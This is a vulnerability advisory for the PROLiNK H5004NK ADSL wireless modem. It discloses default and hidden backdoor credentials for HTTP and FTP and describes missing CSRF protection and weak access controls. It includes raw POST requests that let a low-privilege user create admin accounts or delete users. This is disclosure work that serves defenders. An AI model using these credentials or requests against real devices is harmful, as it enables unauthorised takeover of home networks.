PROLiNK H5004NK ADSL Wireless Modem Multiple Vulnerabilities

1. # Exploit Title: [PROLiNK H5004NK ADSL Wireless Modem Multiple
2. Vulnerabilities]
3. # Discovered by: Karn Ganeshen
4. # Reported on: [October 13, 2015]
5. # Vendor Response: [No process to handle vuln reports]
6. # Vendor Homepage: [
7. http://www.prolink2u.com/newtemp/datacom/adsl-modem-router/381-h5004nk.html]
8. # Version Affected: [Firmware version R76S Slt 4WNE1 6.1R]
9.  
10.  
11. **Vulnerability Details**
12.  
13. *1. Default, weak passwords for http and ftp services *
14.  
15. a. *HTTP accounts*
16. - admin/password
17. - user/user
18. - guest/XXXXairocon
19.  
20. <chain N="USERNAME_PASSWORD">
21. <V N="FLAG" V="0x0"/>
22. <V N="USERNAME" V="admin"/>
23. <V N="PASSWORD" V="password"/>
24. <V N="BACKDOOR" V="0x0"/>
25. <V N="PRIORITY" V="0x2"/>
26. </chain>
27.  
28. <chain N="USERNAME_PASSWORD">
29. <V N="FLAG" V="0x0"/>
30. <V N="USERNAME" V="user"/>
31. <V N="PASSWORD" V="user"/>
32. <V N="BACKDOOR" V="0x0"/>
33. <V N="PRIORITY" V="0x0"/> </chain>
34.  
35. <chain N="USERNAME_PASSWORD">
36. <V N="FLAG" V="0x0"/>
37. <V N="USERNAME" V="guest"/>
38. <V N="PASSWORD" V="XXXXairocon"/>
39. <V N="BACKDOOR" V="0x1"/>
40. <V N="PRIORITY" V="0x1"/> </chain>
41.  
42. *XXXX -> last four digits of MAC address *
43.  
44. b. *FTP accounts*
45.  
46. - admin/admin
47. - useradmin/useradmin
48. - user/user
49.  
50. <chain N="FTP_SERVER">
51. <V N="ENABLE" V="0x1"/>
52. <V N="USERNAME" V="admin"/>
53. <V N="PASSWORD" V="admin"/>
54. <V N="PORT" V="0x15"/>
55. <V N="USERRIGHT" V="0x3"/>
56. <V N="INSTNUM" V="0x1"/> </chain>
57.  
58. <chain N="FTP_SERVER">
59. <V N="ENABLE" V="0x1"/>
60. <V N="USERNAME" V="useradmin"/>
61. <V N="PASSWORD" V="useradmin"/>
62. <V N="PORT" V="0x15"/>
63. <V N="USERRIGHT" V="0x2"/>
64. <V N="INSTNUM" V="0x2"/> </chain>
65.  
66. <chain N="FTP_SERVER">
67. <V N="ENABLE" V="0x1"/>
68. <V N="USERNAME" V="user"/>
69. <V N="PASSWORD" V="user"/>
70. <V N="PORT" V="0x15"/>
71. <V N="USERRIGHT" V="0x1"/>
72. <V N="INSTNUM" V="0x3"/> </chain>
73.  
74.  
75. 2. *Backdoor accounts*
76. The device comes configured with privileged, backdoor account.
77.  
78. For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor
79. account. This is seen in the config file:
80.  
81. <chain N="USERNAME_PASSWORD">
82. <V N="FLAG" V="0x0"/>
83. <V N="USERNAME" V="guest"/>
84. <V N="PASSWORD" V="XXXXairocon"/>
85. <V N="BACKDOOR" V="0x1"/>
86. <V N="PRIORITY" V="0x1"/>
87. </chain>
88.  
89. This user is not shown / visible in the user list when logged in as admin
90. (privileged user).
91.  
92.  
93. 3. *No CSRF protection*
94. There is no CSRF token set in any of the forms / pages.
95.  
96. It is possible to silently execute HTTP requests if the user is logged in.
97.  
98.  
99. 4. *Weak RBAC controls *
100.  
101. 5a) *A non-admin user (user) can create and delete any other users,
102. including root-privileged accounts. *
103.  
104. There are three users:
105.  
106. admin:password -> priv 2 is super user account with full functional access
107. (admin/root)
108. user:user -> priv 0 -> can access only some functions (user)
109. guest:XXXXairocon -> privileged backdoor login
110.  
111.  
112. *Normally: *
113.  
114. - user can create new account with restricted user privs only.
115. - user can change its password and only other non-admin users.
116. - user can delete any other non-admin users.
117.  
118. However, the application does not enforce strict rbac and it is possible
119. for a non-admin user to create a new account with admin privileges.
120.  
121.  
122. This is done as follows:
123.  
124. 1. Start creating a new user, and intercepting the user creation POST
125. request
126. 2. Intercept & Change privilege parameter value from 0 (user) to 2 (admin)
127. - Submit request
128. 3. When the new admin user is created successfully, it does not show up in
129. user list
130. 4. Confirm via logging in as new admin, and / or configured accounts in
131. configuration file (config.img)
132.  
133.  
134. This is the POST request to create a new user:
135.  
136. *Create user http request*:
137.  
138. POST /form2userconfig.cgi HTTP/1.1
139. Host: <IP>
140. User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
141. Firefox/38.0
142. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
143. Accept-Language: en-US,en;q=0.5
144. Accept-Encoding: gzip, deflate
145. DNT: 1
146. Referer: http://<IP>/userconfig.htm?v=
147. Cookie: SessionID=
148. Connection: keep-alive
149. Content-Type: application/x-www-form-urlencoded
150. Content-Length: 115
151. username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=
152.  
153.  
154. *Note1*: In some cases, this password change function is not accessible to
155. 'user' via GUI. But we can still send a POST request to create a valid, new
156. higher privileged account.
157.  
158. *Note2*: In some cases, application does not create admin priv user, in the
159. first attempt. However, in the 2nd or 3rd attempt, new user is created
160. without any issue.
161.  
162.  
163. *Delete user http request:*
164. A non-admin user can delete any configured user(s) including privileged
165. users (admin).
166.  
167. POST /form2userconfig.cgi HTTP/1.1
168. Host: <ip>
169. User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
170. Firefox/38.0
171. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
172. Accept-Language: en-US,en;q=0.5
173. Accept-Encoding: gzip, deflate
174. DNT: 1
175. Referer: http://<IP>/userconfig.htm
176. Cookie: SessionID=
177. Connection: keep-alive
178. Content-Type: application/x-www-form-urlencoded
179. Content-Length: 131
180. username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%
181.  
182.  
183. In case (non-admin) user is deleting the admin login (priv 2), action
184. status can be confirmed by checking the configuration.
185. In case (non-admin) user is deleting another user login (priv 0), action
186. status can be confirmed by checking the user list.
187.  
188.  
189. 5b) *(non-admin priv) User can access unauthorized functions.*
190. Normally, 'user' does not have access to all the functionality of the
191. device. It has access to Status, Setup and Maintenance.
192.  
193. However, few functions can still be accessed by calling them directly. For
194. example, to access the mac filtering configuration this url can be opened
195. directly:
196.  
197. http://<IP>/fw-macfilter.htm
198.  
199. Other functions may also be accessible in this manner.
200.  
201.  
202. 6. *Sensitive information not secured from low privileged users *
203.  
204. A non-admin privileged user has access to download the configuration file
205. - config.img.
206.  
207. This file contains clear-text passwords, keys and other sensitive
208. information which can be used to gain privileged access.
209.  
210.  
211. 7. *Sensitive information accessible in clear-text*
212.  
213. Sensitive Information like passwords and keys are not secured properly.
214. Mostly these are either shown in clear-text or cen censored *****, it is
215. possible to view clear-text values by 'Inspect Element' locally or
216. intercepting http requests, or sniffing.